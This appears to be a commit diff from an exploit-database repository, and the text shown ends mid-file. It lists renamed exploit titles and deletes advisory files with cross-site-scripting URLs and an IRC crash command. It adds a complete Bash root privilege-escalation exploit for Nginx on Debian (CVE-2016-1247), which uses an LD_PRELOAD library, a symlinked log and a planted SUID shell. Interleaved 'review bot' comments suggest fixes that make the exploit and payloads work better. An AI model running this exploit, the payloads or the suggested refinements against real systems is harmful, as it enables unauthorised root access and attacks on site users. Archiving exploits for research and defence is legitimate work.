ZYXEL ZyWALL Quagga/Zebra - (Default Password) Remote Root Exploit
ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit
Red Hat Linux 7.0 Apache - Remote 'Username' Enumeration
RedHat Linux 7.0 Apache - Remote 'Username' Enumeration
Red Hat Interchange 4.8.x - Arbitrary File Read
RedHat Interchange 4.8.x - Arbitrary File Read
Red Hat Apache 2.0.40 - Directory Index Default Configuration Error
RedHat Apache 2.0.40 - Directory Index Default Configuration Error
Foreman (Red Hat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)
Foreman (RedHat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)
Red Hat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities
RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities
Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)
RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)
Katello (Red Hat Satellite) - users/update_roles Missing Authorisation (Metasploit)
Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)
Red Hat Stronghold Web Server 2.3 - Cross-Site Scripting
RedHat Stronghold Web Server 2.3 - Cross-Site Scripting
Red Hat Piranha - Remote Security Bypass
RedHat Piranha - Remote Security Bypass
KISGB 5.1.1 - (Authenticate.php) Remote File Inclusion
KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion
Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion
Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion
phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution
phpBP RC3 (2.204) - SQL Injection / Remote Code Execution
eXV2 Module MyAnnonces - (lid) SQL Injection
eXV2 Module eblog 1.2 - (blog_id) SQL Injection
eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection
eXV2 Module WebChat 1.60 - (roomid) SQL Injection
eXV2 Module MyAnnonces - 'lid' Parameter SQL Injection
eXV2 Module eblog 1.2 - 'blog_id' Parameter SQL Injection
eXV2 Module Viso 2.0.4.3 - 'kid' Parameter SQL Injection
eXV2 Module WebChat 1.60 - 'roomid' Parameter SQL Injection
Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion
Fuzzylime CMS 3.01 - 'admindir' Parameter Remote File Inclusion
Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion
Exero CMS 1.0.1 - 'theme' Parameter Multiple Local File Inclusion
Joomla! Component Acajoom (com_acajoom) - SQL Injection
Joomla! Component Acajoom 1.1.5 - SQL Injection
ASPapp Knowledge Base - 'links.asp CatId' SQL Injection
Joomla! Component joovideo 1.2.2 - 'id' SQL Injection
Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection
Mambo Component 'com_accombo' 1.x - 'id' SQL Injection
Joomla! Component Restaurante 1.0 - 'id' SQL Injection
PEEL CMS - Admin Hash Extraction / Arbitrary File Upload
RunCMS Module section - (artid) SQL Injection
ASPapp Knowledge Base - SQL Injection
ASPapp Knowledge Base - 'CatId' Parameter SQL Injection
Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection
Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection
Mambo Component Accombo 1.x - 'id' Parameter SQL Injection
Joomla! Component Restaurante 1.0 - 'id' Parameter SQL Injection
PEEL CMS 3.x - Admin Hash Extraction / Arbitrary File Upload
RunCMS Module section - 'artid' Parameter SQL Injection
ASPapp Knowledge Base - SQL Injection
RunCMS Module Photo 3.02 - 'cid' SQL Injection
D.E. Classifieds - 'cat_id' SQL Injection
RunCMS Module Photo 3.02 - 'cid' Parameter SQL Injection
D.E. Classifieds - 'cat_id' Parameter SQL Injection
PHP-Nuke Platinum 7.6.b.5 - (dynamic_titles.php) SQL Injection
PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection
Joomla! Component rekry 1.0.0 - (op_id) SQL Injection
destar 0.2.2-5 - Arbitrary Add New User Exploit
Joomla! Component rekry 1.0.0 - 'op_id' Parameter SQL Injection
Destar 0.2.2-5 - Arbitrary Add New User Exploit
destar 0.2.2-5 - Arbitrary Add Admin
Destar 0.2.2-5 - Arbitrary Add Admin
BolinOS 4.6.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Security Vulnerabilities
Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection
BolinOS 4.6.1 - Local File Inclusion / Cross-Site Scripting
Joomla! Component Alphacontent 2.5.8 - 'id' Parameter SQL Injection
TopperMod 1.0 - (mod.php) Local File Inclusion
TopperMod 1.0 - 'mod.php' Local File Inclusion
Joomla! Component MyAlbum 1.0 - (album) SQL Injection
Joomla! Component MyAlbum 1.0 - 'album' Parameter SQL Injection
Smoothflash - 'admin_view_image.php cid' SQL Injection
Smoothflash - 'cid' Parameter SQL Injection
JShop 1.x < 2.x - (page.php xPage) Local File Inclusion
WordPress Plugin Download - (dl_id) SQL Injection
PHPSpamManager 0.53b - (body.php) Remote File Disclosure
Woltlab Burning Board Addon JGS-Treffen - SQL Injection
Neat weblog 0.2 - 'articleId' SQL Injection
EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection
FaScript FaPhoto 1.0 - (show.php id) SQL Injection
Mambo Component 'com_ahsshop' 1.51 - 'vara' Parameter SQL Injection
eggBlog 4.0 - Password Retrieve SQL Injection
Joomla! Component actualite 1.0 - 'id' SQL Injection
JShop 1.x < 2.x - 'xPage' Parameter Local File Inclusion
WordPress Plugin Download - 'dl_id' Parameter SQL Injection
PHPSpamManager 0.53b - 'body.php' Remote File Disclosure
Woltlab Burning Board Addon JGS-Treffen 2.0.2 - SQL Injection
Neat weblog 0.2 - 'articleId' Parameter SQL Injection
EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion
FaScript FaPhoto 1.0 - 'show.php' SQL Injection
Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection
eggBlog 4.0 - SQL Injection
Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection
PHPAddressBook 2.11 - (view.php id) SQL Injection
PHPAddressBook 2.11 - 'view.php' SQL Injection
Joomla! Component com_alphacontent - Blind SQL Injection
Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection
Joomla! Component 'com_eventbooking' 2.10.1 - SQL Injection
Joomla! Component Event Booking 2.10.1 - SQL Injection
Nuked-klaN 1.3 - Multiple Cross-Site Scripting Vulnerabilities
JShop E-Commerce Suite - xSearch Cross-Site Scripting
JShop E-Commerce Suite 3.0 - 'page.php' Cross-Site Scripting
JShop E-Commerce Suite 1.2 - product.php Cross-Site Scripting
Nuked-klaN 1.7 Sections Module - artid Parameter SQL Injection
Nuked-klaN 1.7 Sections Module - 'artid' Parameter SQL Injection
Nuked-klaN 1.7 Download Module - dl_id Parameter SQL Injection
Nuked-klaN 1.7 Links Module - link_id Parameter SQL Injection
Nuked-klaN 1.7 Download Module - 'dl_id' Parameter SQL Injection
Nuked-klaN 1.7 Links Module - 'link_id' Parameter SQL Injection
Nuked-klaN 1.7 - 'index.php' Cross-Site Scripting
Foreman (Red Hat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)
Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)
Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting
Eggblog 3.1 - admin/comments.php edit Parameter Cross-Site Scripting
Eggblog 3.1 - admin/users.php add Parameter Cross-Site Scripting
Eggblog 3.1 - rss.php Cross-Site Scripting
Nuked-klaN 1.7.5 - File Parameter News Module Cross-Site Scripting
Cuteflow Bin 1.5 - pages/showtemplates.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/editmailinglist_step1.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/showcirculation.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/edittemplate_step2.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting
Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting
CS-Cart 4.3.10 - XML External Entity Injection
CoronaMatrix phpAddressBook 2.0 - 'Username' Cross-Site Scripting
Cisco BBSM Captive Portal 5.3 - 'AccesCodeStart.asp' Cross-Site Scripting
Cacti 0.8.7 (Red Hat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting
Cacti 0.8.7 (RedHat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting
Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload
Mambo Component 'com_ahsshop' - SQL Injection
Mambo Component Ahsshop - SQL Injection
Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting
Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation
Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation
WordPress Plugin XCloner 3.1.5 - Multiple Vulnerabilities
parent 2e7215ec08
commit e1c4e9e1ec
27 changed files with 605 additions and 520 deletions
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/29191/info
|
|
||||||
|
|
||||||
Cisco BBSM (Building Broadband Service Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
|
||||||
|
|
||||||
Cisco BBSM 5.3 is vulnerable; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/ekgnkm/AccessCodeStart.asp?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
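Review bot: the renamed title in the commit message reads 'AccesCodeStart.asp' while the PoC URL in this hunk requests `/ekgnkm/AccessCodeStart.asp?msg=...`; one of the two is misspelled, and since the script name is what readers grep for, the title should be made to match the URL (or the URL corrected to the real script name) before the rename lands.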
231
platforms/linux/local/40768.sh
Executable file
@ -0,0 +1,231 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
|
||||||
|
#
|
||||||
|
# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
|
||||||
|
# nginxed-root.sh (ver. 1.0)
|
||||||
|
#
|
||||||
|
# CVE-2016-1247
|
||||||
|
#
|
||||||
|
# Discovered and coded by:
|
||||||
|
#
|
||||||
|
# Dawid Golunski
|
||||||
|
# dawid[at]legalhackers.com
|
||||||
|
#
|
||||||
|
# https://legalhackers.com
|
||||||
|
#
|
||||||
|
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
|
||||||
|
#
|
||||||
|
# ---
|
||||||
|
# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
|
||||||
|
# etc.) to escalate their privileges from nginx web server user (www-data) to root
|
||||||
|
# through unsafe error log handling.
|
||||||
|
#
|
||||||
|
# The exploit waits for Nginx server to be restarted or receive a USR1 signal.
|
||||||
|
# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
|
||||||
|
# script which is called daily by the cron.daily on default installations.
|
||||||
|
# The restart should take place at 6:25am which is when cron.daily executes.
|
||||||
|
# Attackers can therefore get a root shell automatically in 24h at most without any admin
|
||||||
|
# interaction just by letting the exploit run till 6:25am assuming that daily logrotation
|
||||||
|
# has been configured.
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Exploit usage:
|
||||||
|
# ./nginxed-root.sh path_to_nginx_error.log
|
||||||
|
#
|
||||||
|
# To trigger logrotation for testing the exploit, you can run the following command:
|
||||||
|
#
|
||||||
|
# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx
|
||||||
|
#
|
||||||
|
# See the full advisory for details at:
|
||||||
|
# https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
|
||||||
|
#
|
||||||
|
# Video PoC:
|
||||||
|
# https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# For testing purposes only. Do no harm.
|
||||||
|
#
|
||||||
|
|
||||||
|
BACKDOORSH="/bin/bash"
|
||||||
|
BACKDOORPATH="/tmp/nginxrootsh"
|
||||||
|
PRIVESCLIB="/tmp/privesclib.so"
|
||||||
|
PRIVESCSRC="/tmp/privesclib.c"
|
||||||
|
SUIDBIN="/usr/bin/sudo"
|
||||||
|
|
||||||
|
function cleanexit {
|
||||||
|
# Cleanup
|
||||||
|
echo -e "\n[+] Cleaning up..."
|
||||||
|
rm -f $PRIVESCSRC
|
||||||
|
rm -f $PRIVESCLIB
|
||||||
|
rm -f $ERRORLOG
|
||||||
|
touch $ERRORLOG
|
||||||
|
if [ -f /etc/ld.so.preload ]; then
|
||||||
|
echo -n > /etc/ld.so.preload
|
||||||
|
fi
|
||||||
|
echo -e "\n[+] Job done. Exiting with code $1 \n"
|
||||||
|
exit $1
|
||||||
|
}
|
||||||
|
|
||||||
|
function ctrl_c() {
|
||||||
|
echo -e "\n[+] Ctrl+C pressed"
|
||||||
|
cleanexit 0
|
||||||
|
}
|
||||||
|
|
||||||
|
#intro
|
||||||
|
|
||||||
|
cat <<_eascii_
|
||||||
|
_______________________________
|
||||||
|
< Is your server (N)jinxed ? ;o >
|
||||||
|
-------------------------------
|
||||||
|
\
|
||||||
|
\ __---__
|
||||||
|
_- /--______
|
||||||
|
__--( / \ )XXXXXXXXXXX\v.
|
||||||
|
.-XXX( O O )XXXXXXXXXXXXXXX-
|
||||||
|
/XXX( U ) XXXXXXX\
|
||||||
|
/XXXXX( )--_ XXXXXXXXXXX\
|
||||||
|
/XXXXX/ ( O ) XXXXXX \XXXXX\
|
||||||
|
XXXXX/ / XXXXXX \__ \XXXXX
|
||||||
|
XXXXXX__/ XXXXXX \__---->
|
||||||
|
---___ XXX__/ XXXXXX \__ /
|
||||||
|
\- --__/ ___/\ XXXXXX / ___--/=
|
||||||
|
\-\ ___/ XXXXXX '--- XXXXXX
|
||||||
|
\-\/XXX\ XXXXXX /XXXXX
|
||||||
|
\XXXXXXXXX \ /XXXXX/
|
||||||
|
\XXXXXX > _/XXXXX/
|
||||||
|
\XXXXX--__/ __-- XXXX/
|
||||||
|
-XXXXXXXX--------------- XXXXXX-
|
||||||
|
\XXXXXXXXXXXXXXXXXXXXXXXXXX/
|
||||||
|
""VXXXXXXXXXXXXXXXXXXV""
|
||||||
|
_eascii_
|
||||||
|
|
||||||
|
echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n"
|
||||||
|
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"
|
||||||
|
|
||||||
|
# Args
|
||||||
|
if [ $# -lt 1 ]; then
|
||||||
|
echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
|
||||||
|
echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
|
||||||
|
exit 3
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Priv check
|
||||||
|
|
||||||
|
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
|
||||||
|
id | grep -q www-data
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n"
|
||||||
|
exit 3
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Set target paths
|
||||||
|
ERRORLOG="$1"
|
||||||
|
if [ ! -f $ERRORLOG ]; then
|
||||||
|
echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n"
|
||||||
|
exit 3
|
||||||
|
fi
|
||||||
|
|
||||||
|
# [ Exploitation ]
|
||||||
|
|
||||||
|
trap ctrl_c INT
|
||||||
|
# Compile privesc preload library
|
||||||
|
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
|
||||||
|
cat <<_solibeof_>$PRIVESCSRC
|
||||||
|
#define _GNU_SOURCE
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <dlfcn.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
|
||||||
|
uid_t geteuid(void) {
|
||||||
|
static uid_t (*old_geteuid)();
|
||||||
|
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
|
||||||
|
if ( old_geteuid() == 0 ) {
|
||||||
|
chown("$BACKDOORPATH", 0, 0);
|
||||||
|
chmod("$BACKDOORPATH", 04777);
|
||||||
|
unlink("/etc/ld.so.preload");
|
||||||
|
}
|
||||||
|
return old_geteuid();
|
||||||
|
}
|
||||||
|
_solibeof_
|
||||||
|
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
|
||||||
|
cleanexit 2;
|
||||||
|
fi
|
||||||
|
|
||||||
|
|
||||||
|
# Prepare backdoor shell
|
||||||
|
cp $BACKDOORSH $BACKDOORPATH
|
||||||
|
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
|
||||||
|
|
||||||
|
# Safety check
|
||||||
|
if [ -f /etc/ld.so.preload ]; then
|
||||||
|
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
|
||||||
|
exit 2
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Symlink the log file
|
||||||
|
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
|
||||||
|
cleanexit 3
|
||||||
|
fi
|
||||||
|
echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`"
|
||||||
|
|
||||||
|
# Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered
|
||||||
|
curl http://localhost/ >/dev/null 2>/dev/null
|
||||||
|
# Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily
|
||||||
|
# rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am)
|
||||||
|
echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..."
|
||||||
|
while :; do
|
||||||
|
sleep 1
|
||||||
|
if [ -f /etc/ld.so.preload ]; then
|
||||||
|
echo $PRIVESCLIB > /etc/ld.so.preload
|
||||||
|
rm -f $ERRORLOG
|
||||||
|
break;
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
# /etc/ld.so.preload should be owned by www-data user at this point
|
||||||
|
# Inject the privesc.so shared library to escalate privileges
|
||||||
|
echo $PRIVESCLIB > /etc/ld.so.preload
|
||||||
|
echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`"
|
||||||
|
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
|
||||||
|
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
|
||||||
|
chmod 755 /etc/ld.so.preload
|
||||||
|
|
||||||
|
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
|
||||||
|
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
|
||||||
|
sudo 2>/dev/null >/dev/null
|
||||||
|
|
||||||
|
# Check for the rootshell
|
||||||
|
ls -l $BACKDOORPATH
|
||||||
|
ls -l $BACKDOORPATH | grep rws | grep -q root
|
||||||
|
if [ $? -eq 0 ]; then
|
||||||
|
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
|
||||||
|
echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m"
|
||||||
|
else
|
||||||
|
echo -e "\n[!] Failed to get root"
|
||||||
|
cleanexit 2
|
||||||
|
fi
|
||||||
|
|
||||||
|
rm -f $ERRORLOG
|
||||||
|
echo > $ERRORLOG
|
||||||
|
|
||||||
|
# Use the rootshell to perform cleanup that requires root privilges
|
||||||
|
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
|
||||||
|
# Reset the logging to error.log
|
||||||
|
$BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`"
|
||||||
|
|
||||||
|
# Execute the rootshell
|
||||||
|
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
|
||||||
|
$BACKDOORPATH -p -i
|
||||||
|
|
||||||
|
# Job done.
|
||||||
|
cleanexit 0
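Review bot: cleanexit never removes $BACKDOORPATH, so the final `cleanexit 0` leaves /tmp/nginxrootsh behind as a root-owned, mode 04777 copy of /bin/bash (set by the preload library's chown/chmod), and because /tmp is sticky the www-data user can no longer unlink it once the run is over. The root-privileged cleanup line `$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"` is the place to fix this: spawn the final shell as `$BACKDOORPATH -p -c "rm -f $BACKDOORPATH; exec /bin/bash -p"` so the SUID file is gone while the euid-0 shell is still usable, and add `rm -f $BACKDOORPATH` to cleanexit for the non-root exit paths. The safety check's bare `exit 2` also skips cleanexit entirely and leaves $PRIVESCSRC, $PRIVESCLIB and the bash copy in /tmp; it should call `cleanexit 2` (with the ld.so.preload truncation guarded, since that file was found to pre-exist). Two smaller points: the usage hint `ps aux | grep nginx | awk -F'log-error=' ...` keys on a `log-error=` option that nginx does not take (its error log path comes from the `error_log` directive in nginx.conf), so the hint prints nothing on real targets; and `echo $PRIVESCLIB > /etc/ld.so.preload` runs twice, once inside the wait loop and again immediately after it.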
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/28413/info
|
|
||||||
|
|
||||||
The 'snircd' and 'ircd' daemons are prone to a remote denial-of-service vulnerability because the application fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users.
|
|
||||||
|
|
||||||
This issue affects versions up to and including 'snircd' 1.3.4 and 'ircu' 2.10.12.12.
|
|
||||||
|
|
||||||
/mode nickname i i i i i i i i i i i i i i i r r r r s
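Review bot: the description names the 'snircd' and 'ircd' daemons, the affected-versions line names 'snircd' 1.3.4 and 'ircu' 2.10.12.12, and the new title keeps only snircd 1.3.4; snircd is a fork of ircu, so ircu being affected is plausible, but the entry should either keep ircu 2.10.12.12 in the title or drop it from the body so the three do not contradict each other.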
@ -1,11 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/6916/info
|
|
||||||
|
|
||||||
It has been reported that Nuked-Klan beta 1.3 is prone to cross site scripting attacks. The problem occurs in the 'Team', 'News', and 'Liens' modules which fails to sufficiently sanitize user-supplied HTML and script code located in URI parameters.
|
|
||||||
|
|
||||||
This vulnerability was reported for Nuked-Klan beta 1.3; earlier versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.org/index.php?file=Team&op=<script>alert('Test');</script>
|
|
||||||
|
|
||||||
http://www.example.org/index.php?file=News&op=<script>alert('test');</script>
|
|
||||||
|
|
||||||
http://www.example.org/index.php?file=Liens&op=<script>alert('test');</script>
@ -1,7 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/9609/info
|
|
||||||
|
|
||||||
A vulnerability has been reported to exist in JShop E-Commerce that may allow a remote user to execute HTML or script code in a user's browser.
|
|
||||||
|
|
||||||
The issue is reported to exist due to improper sanitizing of user-supplied data. It has been reported that HTML and script code may be parsed via a URI parameter of the 'search.php' script. This vulnerability makes it possible for an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the site.
|
|
||||||
|
|
||||||
search.php?xSearch=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscrip%3E&submit=Search
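Review bot: the PoC's closing tag is `%3C%2Fscrip%3E`, which decodes to `</scrip>` rather than `</script>`; an HTML parser only ends script content at `</script`, so with this payload the script element never closes, the rest of the page becomes script text and the alert does not fire. It should read `search.php?xSearch=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&submit=Search`.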
@ -1,7 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/11003/info
|
|
||||||
|
|
||||||
Reportedly the JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'page.php' script. This issue is due to a failure of the application to properly santitize user-supplied input.
|
|
||||||
|
|
||||||
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
|
|
||||||
|
|
||||||
http://www.example.com/page.php?xPage=<SCRIPT>alert(document.cookie)</SCRIPT>
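Review bot: the new title pins this entry to 'JShop E-Commerce Suite 3.0', but the body never names a version ('Reportedly the JShop E-Commerce Suite is affected'), and the same commit keeps a separate 'JShop 1.x < 2.x - 'xPage' Parameter Local File Inclusion' entry on the very same page.php/xPage parameter; add the affected-version line to the body so a reader searching by script name can tell the XSS from the LFI.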
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/12403/info
|
|
||||||
|
|
||||||
JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'product.php' script.
|
|
||||||
|
|
||||||
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
|
|
||||||
|
|
||||||
product.php?xSec=1&xProd=7"><script>alert(document.domain);</script>
|
|
||||||
|
|
||||||
product.php?xSec=1"><script>alert(document.domain);</script>&xProd=7
@ -1,7 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/16424/info
|
|
||||||
|
|
||||||
Nuked-klaN is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
|
|
||||||
|
|
||||||
http://www.example.com/index.php?file=Members&letter=[XSS]
@ -1,7 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/21134/info
|
|
||||||
|
|
||||||
Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
||||||
|
|
||||||
http://www.example.com/[path]/admin/articles.php?edit="><script>alert('Xmors')</script><
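Review bot: the PoC targets admin/articles.php, and the two sibling entries split out of the same BID 21134 target admin/comments.php and admin/users.php, so the victim has to be a logged-in Eggblog administrator; the description's 'unsuspecting user' undersells that prerequisite and should state that these are post-authentication, admin-context reflected XSS. The three files also carry byte-identical descriptions, so each should at least name its own script and parameter (edit, edit, add) instead of the generic 'multiple cross-site scripting vulnerabilities' text.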
@ -1,7 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/21134/info
|
|
||||||
|
|
||||||
Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
||||||
|
|
||||||
http://www.example.com/[path]/admin/comments.php?edit="><script>alert('Xmors')</script><
@ -1,7 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/21134/info
|
|
||||||
|
|
||||||
Eggblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
||||||
|
|
||||||
http://www.example.com/[path]/admin/users.php?add="><script>alert('Xmors')</script><
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/26408/info
|
|
||||||
|
|
||||||
Eggblog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
||||||
|
|
||||||
Eggblog 3.1.0 is vulnerable; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/home/rss.php/<script>alert(1)</script>
@ -1,14 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/26458/info
|
|
||||||
|
|
||||||
Nuked-Klan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
|
||||||
|
|
||||||
Nuked-Klan 1.7.5 is vulnerable; other versions may also be affected.
|
|
||||||
|
|
||||||
Exploit XSS:
|
|
||||||
The GET variable 'file' has been set to:
|
|
||||||
